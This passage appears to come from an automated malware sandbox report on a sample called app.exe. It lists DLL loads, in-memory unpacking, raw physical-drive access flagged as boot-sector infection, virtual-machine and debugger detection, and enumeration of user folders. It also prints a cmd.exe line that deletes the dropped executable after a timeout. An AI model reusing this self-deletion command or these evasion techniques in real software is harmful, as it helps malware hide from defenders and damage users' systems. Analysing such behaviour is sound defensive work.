Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: app.exeStatic file information: File size 1290240 > 1048576
Source: Binary string: SRLPR.pdBf source: app.exe, 00000003.00000003.3101475941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3127769261.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: grabg::C:\\Users\\user\\Desktop\\GQSZOBXUFX\\RMDIWSRLPR.pdBfGbodyFUk1ESVdTU source: app.exe, 00000003.00000003.3101475941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GQSZOBXUFX\\RMDIWSRLPR.pdBfIbodyHUk1ESVdTU source: app.exe, 00000003.00000003.3127769261.00000000055F6000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\app.exeUnpacked PE file: 0.2.app.exe.2560000.2.unpack
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeUnpacked PE file: 3.2.app.exe.2530000.2.unpack
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0042C59F VirtualAlloc,VirtualAlloc,LoadLibraryA,GetProcAddress,0_2_0042C59F
Source: app.exeStatic PE information: section name: )m&
Source: app.exe.0.drStatic PE information: section name: )m&
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00416398 push eax; ret 0_2_004163B6
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00415460 push eax; ret 0_2_00415474
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00415460 push eax; ret 0_2_0041549C
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0047EC7F push FFFFFFA1h; retf 0_2_0047EC82
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00416F33 push ecx; ret 0_2_00416F43
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025F23AD push es; iretd 0_2_025F2454
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025EC6A1 push ecx; ret 0_2_025EC6B4
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025F3881 push eax; ret 0_2_025F3882
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025F691F push eax; ret 0_2_025F6997
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_3_0552C6D7 push cs; iretd 3_3_0552C6D8
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_3_055288A8 pushad ; iretd 3_3_055288A9
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_3_05E6B3EB push ss; retf 3_3_05E6B497
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_3_05E6B3EB push ss; retf 3_3_05E6B497
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025C23AD push es; iretd 3_2_025C2454
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025BC6A1 push ecx; ret 3_2_025BC6B4
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025C3881 push eax; ret 3_2_025C3882
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025C691F push eax; ret 3_2_025C6997

Persistence and Installation Behavior

barindex
Contains functionality to infect the boot sector
Source: C:\Users\user\Desktop\app.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,CloseHandle,CreateFileA,DeviceIoControl,CloseHandle,CloseHandle,CreateFileA,DeviceIoControl,DeviceIoControl,CloseHandle,CloseHandle,GetSystemDirectoryA,CopyFileA,CreateFileA,DeviceIoControl,CloseHandle,GetCurrentProcess,SetPriorityClass,GetCurrentDirectoryA,CreateFileA,FindResourceA,LoadResource,LockResource,SizeofResource,WriteFile,FreeResource,CloseHandle,CloseHandle,CreateFileA,DeleteFileA,DeviceIoControl,CloseHandle,CloseHandle, \\.\PhysicalDrive%d0_2_0040A770
Source: C:\Users\user\Desktop\app.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,CloseHandle,CreateFileA,DeviceIoControl,CloseHandle,CloseHandle,CreateFileA,DeviceIoControl,DeviceIoControl,CloseHandle,CloseHandle,GetSystemDirectoryA,CopyFileA,CreateFileA,DeviceIoControl,CloseHandle,GetCurrentProcess,SetPriorityClass,GetCurrentDirectoryA,CreateFileA,FindResourceA,LoadResource,LockResource,SizeofResource,WriteFile,FreeResource,CloseHandle,CloseHandle,CreateFileA,DeleteFileA,DeviceIoControl,CloseHandle,CloseHandle, \\.\PhysicalDrive%d0_2_0040A770
Source: C:\Users\user\Desktop\app.exeCode function: CreateFileA,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d0_2_00409F46
Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeJump to dropped file

Boot Survival

barindex
Contains functionality to infect the boot sector
Source: C:\Users\user\Desktop\app.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,CloseHandle,CreateFileA,DeviceIoControl,CloseHandle,CloseHandle,CreateFileA,DeviceIoControl,DeviceIoControl,CloseHandle,CloseHandle,GetSystemDirectoryA,CopyFileA,CreateFileA,DeviceIoControl,CloseHandle,GetCurrentProcess,SetPriorityClass,GetCurrentDirectoryA,CreateFileA,FindResourceA,LoadResource,LockResource,SizeofResource,WriteFile,FreeResource,CloseHandle,CloseHandle,CreateFileA,DeleteFileA,DeviceIoControl,CloseHandle,CloseHandle, \\.\PhysicalDrive%d0_2_0040A770
Source: C:\Users\user\Desktop\app.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,CloseHandle,CreateFileA,DeviceIoControl,CloseHandle,CloseHandle,CreateFileA,DeviceIoControl,DeviceIoControl,CloseHandle,CloseHandle,GetSystemDirectoryA,CopyFileA,CreateFileA,DeviceIoControl,CloseHandle,GetCurrentProcess,SetPriorityClass,GetCurrentDirectoryA,CreateFileA,FindResourceA,LoadResource,LockResource,SizeofResource,WriteFile,FreeResource,CloseHandle,CloseHandle,CreateFileA,DeleteFileA,DeviceIoControl,CloseHandle,CloseHandle, \\.\PhysicalDrive%d0_2_0040A770
Source: C:\Users\user\Desktop\app.exeCode function: CreateFileA,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d0_2_00409F46

Hooking and other Techniques for Hiding and Protection

barindex
Self deletion via cmd or bat file
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeProcess created: cmd.exe /c timeout /t 5 & del /f /q C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe && exit
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeProcess created: cmd.exe /c timeout /t 5 & del /f /q C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe && exitJump to behavior
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00401660 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,0_2_00401660
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0040CFF1 IsIconic,GetWindowPlacement,GetWindowRect,0_2_0040CFF1
Source: C:\Users\user\Desktop\app.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\app.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Users\user\Desktop\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Memory
Source: C:\Users\user\Desktop\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_SMBIOSMemory
Source: C:\Users\user\Desktop\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryArray
Source: C:\Users\user\Desktop\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryDevice
Source: C:\Users\user\Desktop\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Users\user\Desktop\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Memory
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_SMBIOSMemory
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryArray
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryDevice
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Source: C:\Users\user\Desktop\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00408FF2 rdtsc 0_2_00408FF2
Source: C:\Users\user\Desktop\app.exeCode function: LoadLibraryA,FreeLibrary,GetAdaptersInfo,GetAdaptersInfo,0_2_00402D69
Source: C:\Users\user\Desktop\app.exeAPI coverage: 2.6 %
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeAPI coverage: 8.1 %
Source: C:\Users\user\Desktop\app.exe TID: 1440Thread sleep count: 53 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe TID: 6904Thread sleep count: 68 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe TID: 1588Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 1928Thread sleep count: 39 > 30Jump to behavior
Source: C:\Users\user\Desktop\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Users\user\Desktop\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00427361 GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,0_2_00427361
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025CA710 CloseHandle,FindFirstFileW,FindClose,HeapFree,HeapFree,HeapFree,0_2_025CA710
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025E4B93 FindFirstFileExW,0_2_025E4B93
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0259A710 CloseHandle,FindFirstFileW,FindClose,HeapFree,HeapFree,HeapFree,3_2_0259A710
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0259FEC0 HeapFree,HeapFree,HeapFree,HeapFree,FindFirstFileW,HeapFree,HeapFree,GetLastError,HeapFree,HeapFree,3_2_0259FEC0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025B4B93 FindFirstFileExW,3_2_025B4B93
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0041E91D VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,0_2_0041E91D
Source: app.exe, 00000003.00000003.3112020011.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123955917.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3107954475.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3092789933.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3121520475.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3121520475.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116384116.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123955917.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3098259663.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3126108218.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3099980672.0000000000956000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: app.exe, 00000003.00000002.3294569055.00000000008CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00408FF2 rdtsc 0_2_00408FF2
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025E44E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_025E44E2
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0042C59F VirtualAlloc,VirtualAlloc,LoadLibraryA,GetProcAddress,0_2_0042C59F
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025CD430 GetProcessHeap,RtlAllocateHeap,0_2_025CD430
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0041B198 SetUnhandledExceptionFilter,0_2_0041B198
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0041B1AC SetUnhandledExceptionFilter,0_2_0041B1AC
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0256EAC0 RtlAddVectoredExceptionHandler,SetThreadStackGuarantee,GetLastError,HeapFree,HeapFree,0_2_0256EAC0
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025DE0C8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_025DE0C8
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025E44E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_025E44E2
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0253EAC0 RtlAddVectoredExceptionHandler,SetThreadStackGuarantee,GetLastError,HeapFree,HeapFree,3_2_0253EAC0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025AE0C8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_025AE0C8
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025B44E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_025B44E2
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025ADC6E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_025ADC6E
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025ADDCA SetUnhandledExceptionFilter,3_2_025ADDCA
Source: C:\Users\user\Desktop\app.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\app.exeProcess created: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe "C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 5Jump to behavior
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00409127 cpuid 0_2_00409127
Source: C:\Users\user\Desktop\app.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,0_2_00401000
Source: C:\Users\user\Desktop\app.exeCode function: GetLocaleInfoA,0_2_0041E705
Source: C:\Users\user\Desktop\app.exeCode function: lstrcpyA,wsprintfA,LoadLibraryA,GetLocaleInfoA,0_2_00429E88
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\.curlrc VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\.curlrc VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\3D Objects VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\3D Objects\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\3D Objects\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\.curlrc VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\.curlrc VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Adobe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Comms VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\D3DSCache VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ElevatedDiagnostics VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Google VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\History VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\IconCache.db VolumeInformationJump to behavior
